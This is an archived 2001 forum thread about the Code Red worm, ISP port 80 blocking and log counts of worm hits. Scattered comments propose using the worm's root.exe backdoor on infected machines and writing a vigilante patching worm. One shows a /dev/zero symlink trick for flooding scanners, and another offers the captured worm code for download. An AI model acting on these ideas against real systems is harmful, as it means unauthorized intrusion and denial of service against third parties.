My server was blocked at 9AM on August 5th. I use it mostly for my resume. I have since relocated my server to port 8080 and it works fine again. I also spoke with a couple different people concerning their blocking port 80, and they totally deny it.

Wow, that's kind of weird considering the traffic ended at EXACTLY 9AM for old pages I used to host on that server. And wow, someone couldn't get to my resume that day, and emailed me about the problem they had. Very odd. I don't have a problem if they are going to block it for whatever reason, but at least admit it in the Agreement. I just want it for personal use...

The Perfect Solution:

Microsoft creates a similar internet worm that gains admin access to install the patch! I'll leave it up to you to name it.

Re:HEY!!!

listen to what i say to you.

Lame words from ATT Mediaone support page

[emptybody]

What Do I Need To Know About The Code Red Virus?
What is the Code Red Virus?

The Code Red virus is a worm virus. The worm is designed to spread the first 20 days of each month and has the potential to disrupt business and personal use of the Internet for applications such as electronic commerce, e-mail and entertainment.

What does the Code Red Virus do?

The worm scans the Internet, locates vulnerable systems and infects these systems by installing itself. Each newly-installed worm joins the others. The uncontrolled growth in scanning slows the speed of the Internet and can cause sporadic but widespread outages.

The virus takes advantage of a defect in Microsoft's Internet Information Services (IIS) software. It affects only computers with the IIS Web server software and Windows NT or 2000 operating systems. Windows 95, Windows 98 and Windows Me operating systems are immune. Therefore, most personal computers in the home cannot be infected. Those users who have computers that have been infected should reboot the machine and install the appropriate Microsoft software patch.

For Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30833
For Windows 2000 Professional, Server and Advanced Server: http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30800
Detailed instructions to use the patches can be found below.

What is AT&T Broadband Doing About the Code Red Virus?

We're closely monitoring our network and keeping a close eye on how our customers are being affected by the Code Red II computer virus. Our engineering team is running scans of the network to identify infected users. After the scan, AT&T Broadband will alert affected customers to assist them in ridding their computer(s) of the virus.

How Does the Code Red Virus Affect AT&T@Home Customers?

You may experience slow connection speeds due to the Code Red II virus traffic across the AT&T Broadband network.

Please note that AT&T Broadband customers are not being affected any differently than DSL or dial-up users. However, the virus can ping computers much faster on our high-speed network creating slower customer speeds.

What Should I Do to Protect Myself from the Code Red Virus:

Customers who have computers infected with the Code Red or Code Red II virus should download the Code Red patch from Microsoft.

If you are running a computer(s) with the IIS Web server software and Windows NT or 2000 operating systems, take these steps to protect computers:

Download the patch
Disconnect from the Internet (see additional instructions below)
Reboot your computer
Run the patch program
Restart your computer again
To properly connect and disconnect your computer from the Internet:

Shut off your computer
Unplug the cable modem from its power supply
Wait approximately 30 - 40 seconds
Plug the cable modem back into the power supply
Turn your computer back on
For more information about online security, please visit our AT&T Broadband Security Web site.The site has detailed information about online security and how to protect your high-speed cable Internet service connection.

Filtering Port 80 Q&As

Why is AT&T Broadband and Excite@Home Filtering HTTP Port 80, and how Does Filtering that Port Prevent the Code Red Virus from Spreading?

In an effort to alleviate the spread of the Code Red and Code Red II viruses on the AT&T Broadband High-Speed Cable Internet Network, AT&T Broadband and Excite@Home are indefinitely filtering all incoming traffic on http port 80 for residential customers.

Since the virus infects computers with the IIS Web server software and Window's NT or 2000 operating systems, the blocking of port 80 traffic is one of the first steps in containing the Code Red viruses on the Excite@Home and AT&T Broadband networks. Containing the Code Red viruses will assist in restoring the AT&T@Home service to the standard our customers have come to expect.

How does the Port 80 filter affect customers?

Blocking of inbound port 80 traffic only affects residential customers that are hosting Web servers with their cable modem. Residential customers that subscribe to Excite@Home Webspace or AT&T@Home Personal Pages and are not hosting a Web server are not affected by the filter.

Are Customers Who Subscribe to AT&T Broadband Business Services Affected by the Port 80 Filter?

The Port 80 filter only affects AT&T@Home residential customers.

Why Can't AT&T@Home Residential Customers Run Web Servers?

The @Home residential service offering is a consumer product designed for your personal use of the Internet. Customers must ensure that their activity does not improperly restrict, inhibit, or degrade any other user's use of the Services, nor represent (in the sole judgment of @Home) an unusually large burden on the network itself.

The benefits and privileges available from the AT&T@Home, and the Internet in general, must be balanced with duties and responsibilities so that other customers can also have a productive experience.

Under the terms of the Excite@Home Acceptable Use Policy, the running of Web servers on a residential AT&T@Home account is not permitted. See Bandwidth, Data Storage and Other Limitations in the Excite@Home Acceptable Use Policy.

*AT&T Broadband does not provide support or endorse most third party applications. If you have questions, concerns or problems with a third party software application, you will need to contact the software manufacturer. In no event shall AT&T Broadband, its agents or officers be liable for any damages whatsoever (including, without limitation, damages to computer Hardware or Software) arising out of the use of or inability to use the Software mentioned above, even if AT&T Broadband has been advised of the possibility of such damages.

Two Reasons.....

[C.Lee]

> I don't understand why Symantec classifies a "remote root" exploit as only "medium"
>damage. Code Red^[?] is hitting cable modem networks especially hard,

>
>
1) Microsoft asked (told) them to.

2) Their software doesn't do squat against worms like Code Red.

forgive my ignorance

I have been watching this code red stuff now for weeks with only a passive interest as I have other things to do and I don't feel any threat here on my slackware box. I havenet been particularly irritated either although the schools network seems a bit slower reaching out to the web. But I got one question is the person(s) responsible for this knowm? and how will the be punished for all the bandwith they have wasted?

Re:forgive my ignorance

[gamorck]

Dont count your chickens pal. Based on the fact that the Melissa guy hasnt served a day of time yet (see theregister) - the code red guy probably wont even make it to the court.

Gam
"Flame At Will"

Twenty-four hours.

[ktakki]

grep ida access_log | cut -d" " -f1 | sort | uniq | wc -l

139


Looking over the infected hosts, it seems that half are broadband clients (RR, Bellsouth, Verizon, @Home, etc.), a third are overseas (with .de, .tw, and .kr most prevalent), and the remaining sixth are US corporations, including some Fortune 500 hosts.

I see Code Red as a big boon to jobhunters, especially those looking for SA work. Right there in your logs is a list of companies that are hiring, whether they know it or not.

I guess the big question is this: do you root their box before the first interview or after?

k.

Code Red+White+Blue

[jamesmartinluther]

I was talking with a friend last night and we were joking that we should write a "patriotic" anti-worm worm which spreads itself and, once it has infected a vulnerable system, fixes this stupid problem.

Best of all, it would replace the "hacked by chinese" with a jpg of Wally George's "USA IS #1" space shuttle poster.

Unfortunately, this would probably land you in just as much trouble as the originator of this mess (er, I mean the worm coders).

Earthlink DSL

[Darth+Maul]

I'm on Earthlink DSL in Northern VA, and my server has been going crazy (on the 4.0.0.0 net).
Most of my Code Red hits have been from 4.0.0.0 and 24.0.0.0.

Up past 1200 hits so far just since Sunday. My Code Red hit log can be found here (wonderful Perl script provided by a fellow Slashdotter):

http://stealthboy.dyndns.org/report.html

Do you really know it's "caused enough damage"?

[jscott404]

It's really assuming to say that "the virus has caused enough damage for AT&T (MediaOne) to cut off port 80 across their network. Has this been confirmed? Is this just ingress or are we talking cutting off web surfing? If it's just the ingress, then it seems they're just trying to help prevent the spread of the virus to their subscribers. ...a noble enough cause, me thinks.

I knew it!

[cmdrsed]

Yes, I am unfortunate enough to have AT&T Mediaone cable internet. It was down almost all weekend and then on and off on Monday and today. I suspected it might have been because of the tropical storms in the area but something in my mind told me that they might just be ignorant enough to run IIS and not patch if for the code red worm.

A threat isn't so bad when you're used to it.

[pjbass]

IMHO, they can get away with calling this a "medium" level problem is because of the "standard" out there today. Just look around. Code Red, Code Red 2, SirCam, ILoveYou, and how many other Outlook-born viruses came out recently? The bar has been "raised", if you will, to a level of tolerance of remote root exploits and remote comprimises that people have become numb to it. I know that sounds far-fetched to some, but how often do you hear about a new virus (take Code Red for example), and just brush it off as normal, or not life-threatening, etc.? People have been reading all about Code Red the last few weeks, about its potential to take the internet to its knees, and the general response has been comotose. Average people just accept these things as "normal," so the average user will accept this as normal.

Just to show I don't completely pick on Windows-based products, when SSH 3.0.0 came out, it had one of the worst root exploits (well, exploit that can gain root) in awhile. What happened? CERT fired out an advisory, SSH wrote a patch, and people moved on, without there being a horrible mess. It is just accepted that sh*t happens, and that's that.

To make things worse, Code Red fixes break shit

We installed the fix, and now it broke our OWA access as well as Veritas. Fucking 'A

STILL Logging the worm

[The_Weevil]

I'm logging code red trying to attack my gateway (live with a dummy file ;). Check out the log: www.baxpace.com/gateway

You'll have to copy and paste that link because i only really want people who can be bothered to do that, i still want to have access to the web :).

You can download the viral code there. V2 is the only one that's attacked me so far, spreading over BT Openworlds subnet like wildfire. If a new variant in the code appears, the site will pick it up and store it :)

Weevil

in case anyone cares

Since July 19th ...

$ grep default.ida /usr/local/apache/logs/access_log | wc -l
2106
$ grep default.ida /usr/local/apache/logs/access_log | awk '{print $1}' | sort | uniq |wc -l
868
$ ifconfig eth0 | grep inet
inet addr:24.79.x.x Bcast:24.79.x.255 Mask:255.255.255.0

It is "medium" because hysteria won't help us

[Pac]

It's been already shown that Code Red will not bring the Internet down. And it was never very much of a mortal threat to the majority of the users out there, because those are not running IIS (or any http server, for that matter). And until the more recent versions, the worm was not even a menace the files in the infected system (the recent versions, by installing a backdoor, would allow for a malicious invader to do a lot more damage).

The kind editor should also remember his math and Netcraft nice figures. IIS installations represent some 25% of the servers out there. Most of those are already patched by now. Even when they were not patched Code Red got only 6-7% of them (considering 4 million servers/250 thounsand infected).

Code Red is certainly a local problem in networks where it finds a nice ecologival niche. Cable modem networks are likey to suffer due to their archtecture and their own flaws. Other networks will suffer down the road.

But the main point is that this particular the worm is out of the way for nmost of us (if it ever was in the way) and will only affect the bandwidth locally.

It is almost time to reduce its risk rating to low.

Re:It is "medium" because hysteria won't help us

[danox]

See, the thingwith Code Red is you don't need to have the virus to suffer from it.

My compnay uses domino HTTP servers and so we are safe from CR, however I am currently developing a system for another company, which depends on maintaining conenctievity to their database servers. However their ISP has closed off all access to their servers due to the fact that they were getting hit by code red so hard (from servers outside their network that were infected) that they actually couldn't afford to pay for all the extra network traffic. So the ISP basicaly went offline, leaving me sitting here reading slashdot with deadlines fast approaching.

It seems to me that CR is a threat to businesses. Even if you have no way of getting infected, you can still get messed around indirectly by it

Yes, my local Cox ISP said the arp's are normal.

But I too am seeing 30-50 arp requests EVERY SECOND. The tech support people are idiots. They say anything to get you off the phone. Arp requests are used by a machine just coming onto the network to get an address from the DHCP server. That's a once per boot, or at most once per few hours (when the lease expires) event. With 1,500,000 arps requests per hour hitting my modem, it's no wonder my bandwitdh has sucked the last week or so.

You misunderstand the danger

[Illserve]

Yes, pre-existing worms disappear and no worms of that variety can infect, but in the few minutes of life it had on your system, CodeRed had full access to download other, newer, unpatched, programs that otherwise would be unable to get onboard.

I reiterate, the only safe path is to install on an airgapped machine, or on a well secured LAN. But if you have to download it from the internet, there is a chance that *anything*, not just CodeRed, will be hiding somewhere by the time you patch.

Re:You misunderstand the danger

[interiot]

You're a moron.

point 1: the worm has been disassembled, we know what it does. It's not going to suddenly start unpatching IIS for you.

point 2: yes, in the mean time, other worms can come along, or someone else could use root.exe to install a backdoor. The patch is not going to fix this.

So: download, patch, reboot ASAP. And then search for any backdoors.

You won't necessarily find all the backdoors. The logs could have been modified. EXEs could have been patched. Your checksum program could have been patched. You'll either have to gamble that there's no backdoor, or you'll have to reinstall (while employing that nifty "airgap" word of yours).

Re:You misunderstand the danger

[Illserve]

Yea, I'm a moron alright, a moron to continue this conversation with you.

You've dissambled THIS worm, but every copy of Win2K ships with the IIS vulnerability, so plenty of new worms could be created that do other things.

Point 2 is exactly my point, the patch is not going to fix the secondary damage caused by the worm in the short time it takes you to destroy it.

The only real fix for something that can be exploited so quickly would be to issue new copies of win 2K to everyone with this hole patched, but that's not going to happen. So this hole will exist for however long it takes MS to release the Win2k replacement.

With Linux, on the other hand, new versions come out several times per year, which means the baseline installation for a majority of the users is generally only a few months out of date.

And "airgap" is not mine, it's been around for quite some time in the security community. It's become a bit outdated with the advent of wireless technology however.

Re:You misunderstand the danger

[CharlieG]

Or turn OFF IIS totally before you connect and download the patch - No IIS running, no way to exploit it - run the patch THEN turn IIS on - no big deal

Gee...

[Ranger+Rick]

Lucky for us they caught it in time!

Oh, wait, they didn't. So what, did the NTBugTraq people hire some reporter to toot their horn for them or something?

DAMNIT WILL SOMEONE PLEASE....

[0xffffffff]

Will someone PLEASE try to write a new version of Code Red (call it Code Blue?) that innoculates computers against Code Red? I mean really.. I can't write it, as I've never written a virus/trojan/etc.. But those of you who can should know a challenge when you see it.

Code red growth spurts

[Anemophilous+Coward]

We might be in for another growth spurt...when the hundreds of thousands of college students return to campus and plug in their computers. A good portion of them have probably been unattatched to the network, or will be brand new machines just for school. Working at a University, we aren't looking forward to this potential new stream of *fun*.

One possible saving grace is that most of our students come back after the worm is supposed to sleep (20th of the month). However, it might wake again come Sept. 1st. Not to mention any server out there with bad dates ready to spew it around.

On another note, I've notified several people in other departments that they've been hit with the CR II version. They say "well, I'll just apply the patch". Wrong, that will stop your computer from trying to broadcast the worm. Unfortunately, the patch doesn't clean up the trojan explorer.exe and registry settings. I tell them "you'll need to reformat the whole computer, and they laugh". Well, at least I can be first in line to berate their IT department for not taking that suggestion when their whole networked gets compromised from another backdoor installed during the computers 'open' state.

-A non-productive mind is with absolutely zero balance.
- AC

It's been nuking Qwest DSL

[WillSeattle]

They had to totally drop in the MidWest and they've been getting hammered with all our Cisco 675s they "upgraded" us to out here in Seattle.

I just unplug the box when I'm at work and plug it in when I need to use it, so it can't scan me when I'm dead.

The reason it's medium is MSFT won't do anything about it, and can cause them more problems if they complain about their inaction. They know which side of the bread has super-glue ...

Not an option for ISPs that allow servers.

If I get a static IP for an extra $10 per month, my cablemodem ISP (Cox Express in Las Vegas, NOT Cox@Home) explicitly allows customers to run servers. So they had better not shut down port 80.

I may be safe from Code Red since I run apache, but the default.ida requests coming in every 10 seconds or so is annoying. They do need to kill the flood of arp requests, though. I'm seeing 30 to 50 of these EVERY SECOND! That's about 1,500,000 per hour. Is this the doing of the Code Red worm too? arps shot way up by orders of magnitude over the last few days.

ObPersonalAnecdote

[analog_line]

I'm on Road Runner (AOL/TW) in SA, TX and the traffic light on my cable modem has been blinking nonstop since Saturday night. Thankfully, the first thing I did when I got connected was to get a personal firewall installed. Whenever I'm in Windows the log gets absolutely flooded. In Linux, I don't run any servers save sshd and have a simple "drop everything trying to talk at me" blanket firewall, but it's really degrading performance. Not all the time, but every so often everything slows to a crawl and/or stops altogether.

Just think what'll happen when someone evolves this thing to use an exploit where there is no patch available. Or more than one exploit. Or a cross-platform virus.

@Home started scanning port 80 last night

I found this in my Apache log last night (I know, I shouldn't be running servers, but I have them capped using CBQ so they use very little bandwidth):

24.0.0.203 - - [07/Aug/2001:02:19:23 -0400] "HEAD" 400 - "-" "-"

24.0.0.203 is authorized-scan1.security.home.net, the machine which has been scanning for NNTP servers on port 119, ever since @Home got threatened with the Usenet death penalty.

This is the first time @Home has ever scanned my web server. It seems odd that they're sending an invalid request, although this can distinguish between Apache and IIS. Apache will treat this as HTTP/0.9 and will not send back an HTTP header on it's error page, while IIS sends an error page with full headers.

@Home has never blocked ANY port in my area, including 137-139 (I'm on Cogeco@Home). I've connecting to my home computer from university over those ports, and sucessfully transferred files. The modems are capable of simple firewalling, as any DOCSIS modem should be (I've connected to my modem through SNMP and set up some firewall rules, to block connections on port 1214 - my brother was hogging all my upstream bandwidth by using Morpheus/Kazaa).

I'm still gettings tons of hits from Code Red, but I don't really mind. I find it interesting to look through my logs and see the different versions of the worm. Among hundreds of Code Red hits, I have 3 interesting ones. Instead of saying "GET /default.ida?XXXXXX"..., they are just "XXXXXX"..., with the exploit code on the end. Does anyone know what this is? The first hit was around 12:30am last night.

Re:@Home started scanning port 80 last night

@Home doesn't control Cogeco's network anyway. They only provide mail and portal services to them now.

Re:@Home started scanning port 80 last night

[kilrogg]

wow, I have few non default.ida XXXX too ( 6 comming from 24.219.87.84, all within a 2 minute interval, and 1 from 24.216.35.134). I thought this was a vulnerability that exploited default.ida specifically, why would they try to infect without default.ida? Can it be there's yet another buffer overflow exploit out there? Or is this just some idiot script kiddies.

OpenBSD

Great, I just checked my computer - and IT IS CLEAN !!! I was about to freak out will all the media talking about this weird Interent Worm that attacks web-servers........

What can a good Netizen do?

[Refried+Beans]

I've collected a fair IP list of Code Red infected systems. I would like to do my part and notify these people or their ISP's about their problems. I've sent lists to mediaone.net and home.com, but is that going to do any good? Do the people working at ISP's find this information useful? If so, please post where to send information about Code Red infected PCs.

Re:What can a good Netizen do?

[RWC09]

There is a story running at maximumlinux. It tells how to setup a script to dig through the log files and e-mail the infected systems.

filter it in the switch

[Bender+Unit+22]

I just added a url filtering rule in our Foundry switch so that it blocks all those Red Worm urls. So I don't really care if those MS people patch their servers. Of course that won't help future versions but it does the trick for now.

mediaone EUA ALLOWS FTP AND HTTP SERVERS

[emptybody]

EUA states in section 9(b) this:

9. Service Characteristics
(b) FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer.

Why Symantec says that Code Red is medium.

[milkman1]

It is very emberassing for Microsoft to be responsable for the biggest true worm (as opposed to email worms which can be blocked at a small number of points) in internet history.

It is well known that Microsoft could easily crush Symantec. Almost all of Symantec's products fill holes in the Windows Family Line that do not exist in other operating systems. According to reports that I have read, the Windows XP betas have, firewall software, remote access software, older operating systems have also hurt the viablity of Symantec products.

It is clearly in Symantec's best interest to ensure that Microsoft does not add to many of these new features, and when it does to water them down or license Symantec technology. It would be very easy for microsoft to include a powerfull firewall system based on one of the BSD firewall systems. But instead they have included a weak fire wall that most security consciuos users would find lacking. Microsoft Scan Disk and Defrag are also both examples of code that have been watered down. The code for defrag is even licensed from symantec.

In the past, companies that have made Microsoft look bad have been crushed. Symantec does not want to suffer the same fate

Re:Why Symantec says that Code Red is medium.

[SuiteSisterMary]

Go search google for 'morris worm.' Then repeat, one hundred times, "every problem that Microsoft is having with security, UNIX had, and continues to have."

Re:Why Symantec says that Code Red is medium.

[milkman1]

Please...
Give me a break.
Go search google yourselft!
The Morris worm hit less then 6000 computers
for a period of time, Code Red was infecting that many computes every three minutes.
As of July 19th, 359,000 computers were infected
http://www.cs.berkeley.edu/~srhea/morris-interne t- worm.html
http://www.caida.org/analysis/security/code-red/
Microsoft is worse than unix for the following reasons.
1) it is a monoculture, one web server runing on one operating system, runing on one CPU type. Compare to *nix which has about three popular webservers runing on about 20 OS's runing on about 10 CPU types. For the OS's and webservers, there are hundreds of different builds. This makes building a worm with good penetration very difficult.

2.) Most windows admins no almost nothing about there systems. Nuf said.

This is getting boring and long winded. I have better things to do than explain why windows has such poor security.

Re:Why Symantec says that Code Red is medium.

Then repeat, one hundred times, "every problem that Microsoft is having with security, UNIX had, and continues to have." [emphasis mine]

Oh... and you were doing so good until that last part there... Care to point me to the most recent large-scale worm that affected UNIX? What was it... thirteen years ago?

What you said is partially true, though... UNIX had these problems in the past, but now they're a distant memory. That's the great thing about 30 year old technology: you've had 30 years to iron out the bugs and the security issues.

Re:Why Symantec says that Code Red is medium.

[greenrd]

What was really amusing for me was that when Microsoft ran a "hack this box" challenge a while back, even their own best admins couldn't keep it up without crashing for the whole test! It died multiple times!

As for whether it was hacked, they said not, but I doubt we'll ever really know, will we?

Re:Why Symantec says that Code Red is medium.

[gamorck]

I believe sadmind ranks up there pal. That was only a few months ago. Yeah it changed IIS pages through the unicode exploit - BUT IT SPREAD OVER SOLARIS using a buffer overflow exploit nearly two years old. It got around too - believe me.

Look it up if you dont believe me - but you might to check your facts before shooting off your big mouth next time.

Gam
"Flame at Will"

The real danger

[aralin]

The real problem is that all the boxes that are vulnerable to this one specific exploit advertise themselves all over the net! Everyone knows what exploit it is. All you need to do is to read your apache logs and you own at average 400-500 windows boxes to do ANYTHING you want.

Remote Linux install, anyone?

RR "Virus" Warning

[Xwild]

Well, it appears that RoadRunner is taking it hard as well.. Just got home to find an email from security@rr.com with the subject, "URGENT! VIRUS ALERT!"

Its nice to see that even RoadRunner security doesn't know the difference between a Virus and a Worm.

Also nice to know that us linux users either don't count, or are actually suceptible to this "virus". Another quote from their email, "IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART." And what about all the Win 3.1, Be, OS/2 users!

It would be nice if for once, 'security' people would 1) Know what they're talking about 2) Know how to alert people without causing a panic

My stats

[JediTrainer]

My report on this shows that I'm getting hammered quite a bit. Over 2500 attempted attacks, which is eating quite a bit of bandwidth. And yes, I'm on cable.

My thanks, once again, to the author of the wonderful Perl program which generated this (link available on site).

PHP to the rescue?

[onepower]

Couldn't a PHP script be written to fix the infected servers? We know their IP address have root access right?

Re:PHP to the rescue?

[AndroidCat]

I'd rather just use the backdoor in later versions to drop vincentpricelaugh.wav on their computer and play it a few times.

He had a truely creepy laugh.

Just kidding!

Re:this thing is fascinating - Over 100K attacks..

[Chris_Pugrud]

Granted I have 3 Class C blocks at Exodus, but since 00:00:01 PST on Sunday I have seen 107,581 port 80 attempts. They currently seem to running at about 45/minute.

Chris

Hmm, evil or DDoS in the making

[Cramer]

I know I'm askin' for it, but I couldn't resist:

cd /home/httpd/html
ln -s /dev/zero default.ida

I'm only a 128k ISDN, but with compression, I can push over a T1 worth of zeros :-) (And people say PPPoE has no value.)

Re:Hmm, evil or DDoS in the making

Many a green horn ircer looking for warez has gotten a few megs of dev/zero from me :)

/dcc send photoshop.zip

Code Red...easy fix

Somebody needs to write a Code Red style worm that breaks into all these IIS servers and patches them...

1595 *unique* hits on my road-runner-hosted box

[1010011010]

[root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -f1 -d" " | uniq | wc -l
1595

Re:1595 *unique* hits on my road-runner-hosted box

you forgot to sort, dumbass.

Re:1595 *unique* hits on my road-runner-hosted box

[1010011010]

you forgot to sort, dumbass.

Indeed. I suppose uniq doesn't use a has table.

[root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -d " " -f 1 | uniq | wc -l
1677
[root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -d " " -f 1 | sort | uniq | wc -l
630

You could stop the IIS service...

[thechink]

before downloading and installing the patch

or

choose not to install IIS on installation, download the patch, install IIS while not connected to Internet and then apply patch.

It's ARP packets

The light is blinking because of ARP packets. Every time someone tries to connect to a computer on your cable segment, the router sends an ARP request to find out where to send the data (ARP maps IP address to MAC addresses). This is related to Code Red, but it's just a side effect and is not harmful. An ARP packet is typically 60 bytes long, and I'm getting 10-20 every sends, so that's less than 1 kbyte/sec of bandwidth (cable segments have from 25-42 mbit/sec of bandwidth).

However, I've heard about a new Code Red variant that spoofs ARP packets, overflowing the ARP table in Win98/ME and causing machines to freeze. AFAIK, it doesn't affect other operating systems. It doesn't seem very common either.

BTW, ARP packets are not IP packets, so you can't stop them with iptables/ipchains or any IP firewall, and they won't appear in your logs. Use a sniffer like Ethereal if you want to see what's going on.

Re:It's ARP packets

I'm getting 10-20 every sends

That should be "every second". That corresponds to 600-1200 per minute, which is a lot, but still doesn't use a lot of bandwidth.

Amazingly annoying

[Pedrito]

6 of our machines at work got infected over the weekend. I was under the impression that our web guy had been keeping them up-to-date, but 5 were inside our NAT (infected by the 1 that was outside). I was under the impression that the ones inside the NAT would be ok. Bad assumption.

The bandwidth it used was so bad that it completely wiped out our ability to get out via HTTP. We could ping, get and send mail, but we couldn't browse at all. I had innoculated my home machine, and it wasn't until this morning, when we received a notice from our ISP accusing of massive port scanning of port 80 that I made the connection. I went around the office and, even after 5 of the 6 machines were innoculated, we still couldn't get out via HTTP. It wasn't until the 6th was innoculated that we could get out.

Our line is a 768/512 DSL (I believe those are the numbers), and it amazes me that a single machine infected could cause so much trouble. This is pretty disturbing.

REDUNDANT REDUNDANT REDUNDANT

THIS POST IS REDUNDANT. MODERATE THIS DOWN. THIS POSTER DESERVES TO LOSE KARMA.


lowercase lameass lameness filter lowercase lowercase lowercase lowercase lowercase lowercase

Jeeeeez

[Shoten]

Mediaone has closed off port 80 inbound? WHY? The new version of the worm (the person responsible took the shellcode from the first two variants...yes, that's right, "CodeRed II" is really the third iteration) first checks to see if the machine is running a Chinese or Taiwanese version of Win2K. Ah, yes....it only works against Win2K, since that's the only offset it carries. I don't think that people need to take more action towards securing things a good bit better, but this is a reaction that does not consider the nature of the threat.

sure, yea, but

[Illserve]

How many people do this? Standard policy at most places is probably just to install/patch and then assume everything is rosy.

Wrong. YOUR LOCAL COX AFFILIATE bans servers.

Here in Las Vegas, Cox Express explicitly allows servers if you buy a static IP address for an extra $10/month. Ah, the advantages of a smaller town where IP addresses are plentiful.

Hilariously Ironic . . .

[jgaynor]

The CNN.com story about this makes no mention of AT&T's woes. Wonder Why?

It because they're one of CNN's biggest sponsors. The online video coverage of the story is even preceded by AT&T commercials :). Now THATS Irony!

Here's the Video . . .

Re:What ports does the worm attack?

Thanks. Do you know of any sites that have further info?

Try aris

aris.securityfocus.com lets you look at port access trends. dshield.org is a similar, but much less comprehensive, site.

I'm on AT&T Mediaone...

[dave-fu]

And I can vouch for port 80 being blackholed. Around 2:30 last night was the last scan for default.ida on my machine. I've of course since sent the list of chatty boxes to the helpdesk here, but my webserver's still blackholed as is, I imagine, every other one on here. 5 scans a minute is quite enough.
That said, I haven't gotten so much as a bulk e-mail explaining their actions; it doesn't bother me except that there are inevitably going to be infected users _still_ in the dark about it when the blackhole's lifted.

New variant is a blessing in disguise?

[Nonesuch]

Actually, the new variant may be easier to eradicate than previous versions. The fact that it preferentially scans 'nearby' network address ranges means that the worm will be less widespread, and it should be easier for providers and businesses to detect infected hosts in their network, just by watching for the characteristic overflow attempts in the logs on their various webservers.

I've already seen at least one site sending out automated 'a host in your network may be infected' notices by putting up a CGI script in place of vulnerable IIS binary, and using the ARIN database to try to guess who controls the network that the attacking host resides in.

I only received the warning message because it guessed wrong :-)

Western Ohio Road Runner Cable...

[MattHawk]

...was down most of yesterday, and has been having a lot of slowdowns the past few days. Also, the email server went down at the same time yesterday morning; The pop server came back up yesterday evening, though SMTP just came up a couple hours ago. They distributed an email yesterday (pop was up, so we could receive) saying they had Code Red running rampant in our block of IPs and warning eveyone with NT and 2000 to fix their systems.

Port 80 blocks and arp flooding

I work for a large tech company. They gambled and decided not to patch internally for the reason that we have several thousand Win2k servers. Well they lost that gamble and eventually had to shut off access to port 80 on the whole intranet. Needless to say our internal net was useless today and I am sure the productivity cost them dearly.

On another note, all the arp requests from the @home network has pretty much rendered the 65.x.x.x network useless right now. I have recoreded over 3000 unique IP's (mostly originating from Seattle) with the worm. So in general I am extremely pissed at the idiots who did not patch and the idiots who wrote that crappy IIS software.

Re:Port 80 blocks and arp flooding

I'll echo your sentiment...the company I work for had the same problem. Port 80 access down for about 24 hours now I think...

Absolutely brilliant!

Re:Yes, my local Cox ISP said the arp's are normal

Arp requests are used by a machine just coming onto the network to get an address from the DHCP server.

No, those are BOOTP packets. ARP packets are used any time someone tries to connect to a machine on your cable segments. Generally the router will cache ARP replies, but Code Red could be causing their ARP tables to overflow, making them repeatedly look up the same addresses. Or people may be trying to connect to machines that are turned off. The router never gets an ARP reply, so it keeps sending out requests. Cable segments often have thousands of computers, so it's probably a combination of these things.

I'm graphing the bandwidth of my modem, and incoming data has been at 6 kbit/sec since this thing started. Cable modems have ~40 mbit/sec of bandwidth, so the ARP packets shouldn't be having much effect on bandwidth. Maybe your ISP's T1/T3/etc. lines are congested with traffic.

Worm eats massive bandwith

[oncee]

The problem for us Mac users isn't the fear of infection, but the increased use of bandwith that slowed our access to the Internet at work. I had the experience of trying to do Westlaw.com training on a slow connection today. We finally gave up. I'm glad AT&T took the action it did. It really increased speed this afternoon. I wish my cable modem company would do the same thing. I'm see 4 attacks per minute on my machine at home. Each attempt is deflected by my firewall, but it continues to piss me off, and slow my connection. All broadband providers should take the same action for residental users.

Bell Sympatico DSL

[AndroidCat]

I'm seeing a few hits a minute -- mainly from other Sympatico IPs. It's probably a later version of Code Red.

I'm truely amazed at the number of clueless people running IIS, probably on home machines. (I know, I know: You can never underestimate the intellegence of most users.)

It'd be tempting to use the Code Red II backdoor to drop a "Hey stupid, your computer is infected!" message on their decktop, but sigh, that would be wrong...

Videotron's Warning

I think they are very honest. --------- Dear customer, For some time, a worm-type virus, called "Code Red" has been affecting the operating systems Windows NT 4 and 2000, running "Internet Information Server" ("IIS") 4 or 5 services, propagates on the Internet. Once installed on these systems, this virus tries to reproduce itself on other computers. With this intention, it carries out a sweeping scan on the Internet in search of other vulnerable servers. For users like you, this results in: - a ceaseless flickering of the "Receive" led ("RD" or "RCV"). - constant logging, in your firewall software, of repeated connection attempts on port 80. Put besides these nuisances, these requests do not represent any danger for other operating systems (Windows 95/98/ME, Linux/Unix, etc). Although out of our control, this situation forces us to deploy a good share of efforts and resources in order to counter the network slowdown and the performance drops of our servers. For these reasons, we recommend the concerned users (WinNT4 and 2000) to secure their systems by using the tools at their disposal on Microsoft's web site. You can also find a good deal of complementary informations concerning this virus. Microsoft Security Bulletin MS01-033 : http://www.microsoft.com/technet/treeview/default. asp?url=/technet/security/bulletin/MS01-033.asp (Patches are available at the bottom of the preceding link) We hope that these informations will be useful to you. Our technical support center is opened seven days a week, twenty-four hours a day. We invite you to visit our web site at http://www.videotron.com where you will find details concerning our products and services. Thank you for choosing Vidéotron Best regards, Bruno Cartier Internet residential technical support assistance@videotron.ca Contact us : http://internet.videotron.ca/contact-us/ Internet services: http://internet.videotron.ca/en/

IIS really means...

[Shingis]

Insufficient Internet Security

Real damage done to Britain's telephone inquiries

[Sara+Chan]

I live in England. For the last day or so, it has not been possible to get telephone-directory inquiries for Europe or Asia. Asking for numbers in Canada/USA works fine. But when I've tried to get a number in Eurasia, I've been told that there are no lines to directory inquiries in those countries. The cause is claimed to be CodeRed, but I haven't been able to find out the details.

(Note: calls work fine; it's just directory information that you cannot get.)

Grrrrrr...

[whovian]

&gt cat default.ida

